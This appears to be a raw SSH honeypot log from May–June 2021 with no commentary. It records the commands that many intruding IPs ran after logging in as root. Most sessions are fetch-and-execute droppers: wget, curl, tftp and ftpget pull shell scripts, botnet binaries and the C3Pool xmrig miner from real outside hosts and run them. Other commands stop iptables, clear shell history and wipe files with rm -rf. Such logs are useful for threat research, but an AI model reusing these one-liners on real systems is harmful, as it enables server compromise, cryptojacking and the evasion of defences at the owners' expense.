tftp 51.75.170.84 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
rm -rf tftp2.sh
tftp -r tftp2.sh -g 51.75.170.84
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 209.141.53.114 15-May-2021 21:29:04 ssh2 root
Exec apt update -y; apt install curl -y; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s;timeout 10 top
apt update -y

From 209.141.58.203 17-May-2021 07:07:51 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane root
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane root

From 209.141.58.203 18-May-2021 09:57:41 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*;rm -rf .ssh*; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane root
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane root

From 183.240.218.202 19-May-2021 02:49:44 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s

From 203.26.81.34 21-May-2021 10:06:41 ssh2 root
history
ps aux
curl
exit

From 167.99.131.69 22-May-2021 10:23:09 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 119.29.152.108 23-May-2021 06:27:44 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://152.136.21.229/ug.txt;perl ug.txt*;wget http://152.136.21.229/serv.tar.gz;tar xf serv.tar.gz;cd serv;mv xmrig server;./server
  
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://152.136.21.229/ug.txt
perl ug.txt*
wget http://152.136.21.229/serv.tar.gz
tar xf serv.tar.gz
cd serv
mv xmrig server
./server

From 158.51.127.121 23-May-2021 07:33:14 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://158.51.127.62/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86 ; chmod 777 infn.x86 ; ./infn.x86 roots
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://158.51.127.62/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86
chmod 777 infn.x86
./infn.x86 roots

From 203.26.81.34 24-May-2021 02:41:00 ssh2 root
ps uax
curl
bash
exit

From 85.203.45.90 24-May-2021 17:04:53 ssh2 root
ls
history
curl
ls

From 220.167.103.107 26-May-2021 06:46:32 ssh2 root
ls
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
yum install curl
apt install curl
apt install curl install curl curlcom/xmrig_setup/raw/master/setup_c3pool_miner.sh install curl install curl curlcom/xmrig_setup/raw/master/setup_c3pool_miner.sh curl install curl curlcom/xmrig_setup/raw/master/setup_c3pool_miner.sh
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 209.141.53.114 26-May-2021 23:28:27 ssh2 root
Exec apt update -y; apt install curl -y; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
apt update -y
apt install curl -y
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
timeout 10 top

From 121.5.135.64 29-May-2021 00:47:45 ssh2 root
Exec echo -n Bfhj9kYo|md5sum
echo -n Bfhj9kYo|md5sum

From 157.230.51.227 29-May-2021 09:57:58 ssh2 root
Exec echo -n XHuMGCe5|md5sum
echo -n XHuMGCe5|md5sum

From 209.141.58.203 30-May-2021 03:44:04 ssh2 root

Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.88.121.177/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 23.88.121.177 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 23.88.121.177; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.88.121.177 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.88.121.177/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 23.88.121.177 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 23.88.121.177
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 23.88.121.177 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 209.141.58.203 30-May-2021 05:21:25 ssh2 root

Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sh
curl -O http://209.141.43.118/sh
chmod 777 sh
sh sh
tftp 209.141.43.118 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 209.141.43.118
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf

From 209.141.58.203 30-May-2021 15:12:49 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sh
curl -O http://209.141.43.118/sh
chmod 777 sh
sh sh
tftp 209.141.43.118 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 209.141.43.118
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 213.74.22.134 2-Jun-2021 02:40:04 ssh2 root
Exec cat /etc/issue
cat /etc/issue
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 5.15.10.52 2-Jun-2021 07:50:20 ssh2 root
top
?
w
uname -a
ps ax
history
ls -all
wget
curl
last
kill -9 -1
exit

From 198.23.172.240 2-Jun-2021 08:26:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.172.240/100UP.sh; curl -O http://198.23.172.240/100UP.sh; chmod 777 100UP.sh; sh 100UP.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.172.240/100UP.sh
curl -O http://198.23.172.240/100UP.sh
chmod 777 100UP.sh
sh 100UP.sh
rm -rf *

From 209.141.58.203 4-Jun-2021 00:56:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/8UsA.sh; curl -O http://209.141.43.118/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 209.141.43.118 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 209.141.43.118; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/8UsA.sh
curl -O http://209.141.43.118/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 209.141.43.118 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 209.141.43.118
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.58.203 4-Jun-2021 08:30:59 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sensi.sh; curl -O http://209.141.43.118/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.43.118 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.43.118; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sensi.sh
curl -O http://209.141.43.118/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.43.118 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.43.118
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 146.255.75.70 6-Jun-2021 03:43:32 ssh2 root
ls
ps x
lscpu
uname -0a
uname -a
cd /home
ls
exit

From 185.36.81.246 6-Jun-2021 09:28:46 ssh2 root
Exec cat /etc/issue; wget http://45.10.24.18/x86_64; chmod 777 x86_64; ./x86_64 skids
cat /etc/issue
wget http://45.10.24.18/x86_64
chmod 777 x86_64
./x86_64 skids

From 213.74.22.134 6-Jun-2021 09:53:54 ssh2 root
Exec cd /tmp;rm -rf ur0a.x86_64;wget http://107.172.156.158/Ryuk/ur0a.x86_64;chmod +x ur0a.x86_64;./ur0a.x86_64 x86_64;rm -rf ur0a.x86_64;curl -O http://107.172.156.158/Ryuk/ur0a.x86_64;chmod +x ur0a.x86_64;./ur0a.x86_64 x86_64;rm -rf ur0a.x86_64;busybox wget http://107.172.156.158/Ryuk/ur0a.x86_64;chmod +x ur0a.x86_64;./ur0a.x86_64 x86_64;rm -rf ur0a.x86_64
cd /tmp
rm -rf ur0a.x86_64
wget http://107.172.156.158/Ryuk/ur0a.x86_64
chmod +x ur0a.x86_64
./ur0a.x86_64 x86_64
rm -rf ur0a.x86_64
curl -O http://107.172.156.158/Ryuk/ur0a.x86_64
chmod +x ur0a.x86_64
./ur0a.x86_64 x86_64
rm -rf ur0a.x86_64
busybox wget http://107.172.156.158/Ryuk/ur0a.x86_64
chmod +x ur0a.x86_64
./ur0a.x86_64 x86_64
rm -rf ur0a.x86_64

From 106.54.187.30 7-Jun-2021 03:26:20 ssh2 root
Exec echo -n pQ8tbAEg|md5sum
echo -n pQ8tbAEg|md5sum

From 187.188.190.48 7-Jun-2021 09:22:52 ssh2 root
Exec echo -n YLXBEEfg|md5sum
echo -n YLXBEEfg|md5sum

From 178.138.96.60 7-Jun-2021 09:43:19 ssh2 root
w
lscpu
wget http://130.0.164.120/scan.jpg
curl
wget --no-check-certificate http://130.0.164.120/scan.jpg
wget -q -O http://130.0.164.120/scan.jpg

From 178.138.96.60 7-Jun-2021 09:46:10 ssh2 root
sftp
scp
lwp
lwp-download
uname -a
id richard
w
last
lastlog
halt

From 49.232.4.253 7-Jun-2021 16:54:23 ssh2 root
Exec echo -n H61bYOlu|md5sum
echo -n H61bYOlu|md5sum

From 178.138.96.60 7-Jun-2021 20:59:31 ssh2 root
w
lscpu
ping
halt

From 209.141.58.203 8-Jun-2021 12:52:26 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.42.231/sensi.sh; curl -O http://209.141.42.231/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.42.231 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.42.231; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.42.231 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.42.231/sensi.sh
curl -O http://209.141.42.231/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.42.231 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.42.231
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.42.231 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.58.203 8-Jun-2021 21:13:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.43.118/sh; curl -O http://209.141.43.118/sh; chmod 777 sh; sh sh; tftp 209.141.43.118 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 209.141.43.118; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.43.118/sh
curl -O http://209.141.43.118/sh
chmod 777 sh
sh sh
tftp 209.141.43.118 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 209.141.43.118
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.43.118 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 81.68.67.193 9-Jun-2021 07:01:45 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 195.133.40.22 9-Jun-2021 11:09:35 ssh2 root
Exec wget cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://190.123.45.34/ultraesgrima.sh; chmod 777 ultraesgrima.sh; sh ultraesgrima.sh;rm -rf *
wget cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://190.123.45.34/ultraesgrima.sh
chmod 777 ultraesgrima.sh
sh ultraesgrima.sh
rm -rf *

From 41.242.56.81 10-Jun-2021 01:21:28 ssh2 root
Exec echo -n s0wzgajg|md5sum
echo -n s0wzgajg|md5sum

From 123.96.143.29 11-Jun-2021 18:39:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.212.32.99:1234/em;chmod 777 em;./em;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.212.32.99:1234/em
chmod 777 em
./em

From 203.159.80.97 11-Jun-2021 23:45:03 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://31.210.20.48/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://31.210.20.48/dirdir000/0s1s12.x86
cat 0s1s12.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 209.141.58.203 12-Jun-2021 11:32:18 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.58.203 12-Jun-2021 12:07:12 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.48.24 12-Jun-2021 15:32:21 ssh2 root
Exec cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 x86hxed; echo firewalla1337 & Anarchy were here
cat /etc/issue
cd /tmp
rm -rf x86_64
wget http://45.14.149.244/x86_64
chmod 777 x86_64
./x86_64 x86hxed
echo firewalla1337
Anarchy were here

From 157.230.227.135 12-Jun-2021 23:49:01 ssh2 root
Exec echo -n ngXCfxY9|md5sum
echo -n ngXCfxY9|md5sum

From 205.185.127.240 13-Jun-2021 01:17:39 ssh2 root
Exec cat /etc/issue; wget http://209.141.41.222/bins/jew.x86; chmod 777 jew.x86; ./jew.x86 root; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
wget http://209.141.41.222/bins/jew.x86
chmod 777 jew.x86
./jew.x86 root
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
echo firewalla1337 was here

From 62.171.156.18 14-Jun-2021 01:49:21 ssh2 root
Exec uname -a;nproc;wget https://gsmboss.clan.su/zn.jpg;perl zn.jpg;rm -rf zn*;history -c
uname -a
nproc
wget https://gsmboss.clan.su/zn.jpg
perl zn.jpg
rm -rf zn*
history -c

From 209.141.58.203 17-Jun-2021 01:25:15 ssh2 root
Exec uname -a
uname -a
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.48.24 17-Jun-2021 11:35:37 ssh2 root
Exec cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 x86hxed; echo firewalla1337 & Anarchy were here
cat /etc/issue
cd /tmp
rm -rf x86_64
wget http://45.14.149.244/x86_64
chmod 777 x86_64
./x86_64 x86hxed
echo firewalla1337
Anarchy were here

From 209.141.43.233 17-Jun-2021 23:49:41 ssh2 root
Exec cat /etc/issue; cd /tmp; rm -rf x86_64; wget http://45.14.149.244/x86_64; chmod 777 x86_64; ./x86_64 test; echo firewalla1337 and Anarchy were here
cat /etc/issue
cd /tmp
rm -rf x86_64
wget http://45.14.149.244/x86_64
chmod 777 x86_64
./x86_64 test
echo firewalla1337 and Anarchy were here

From 209.141.48.24 18-Jun-2021 11:09:49 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 136.144.41.169 18-Jun-2021 13:22:46 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://136.144.41.168/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://136.144.41.168/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86
cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 209.141.43.233 19-Jun-2021 15:09:31 ssh2 root
Exec cat /etc/issue; lscpu | grep 'Model name'; yum update -y; apt update -y; yum install curl -y; apt install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
cat /etc/issue
lscpu | grep 'Model name'
yum update -y
apt update -y
yum install curl -y
apt install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX

From 209.141.43.233 19-Jun-2021 15:36:23 ssh2 root
Exec cat /etc/issue; lscpu | grep 'Model name'; yum update -y; apt update -y; yum install curl -y; apt install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
cat /etc/issue
lscpu | grep 'Model name'
yum update -y
apt update -y
yum install curl -y

From 5.2.69.50 19-Jun-2021 15:36:25 ssh2 root
apt install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX

From 209.141.58.203 20-Jun-2021 18:02:59 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.58.203/ssh2 || curl -o ssh2 209.141.58.203/ssh2; tar xvf ssh2; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh2 || curl -o ssh2 209.141.58.203/ssh2
tar xvf ssh2
cd .ssh
chmod +x *
./sshd
./krane 1

From 188.166.11.150 20-Jun-2021 20:55:16 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.58.203 20-Jun-2021 22:25:57 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.58.203 20-Jun-2021 22:33:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 103.151.5.177 21-Jun-2021 03:18:49 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 157.230.87.222 22-Jun-2021 19:58:57 ssh2 root
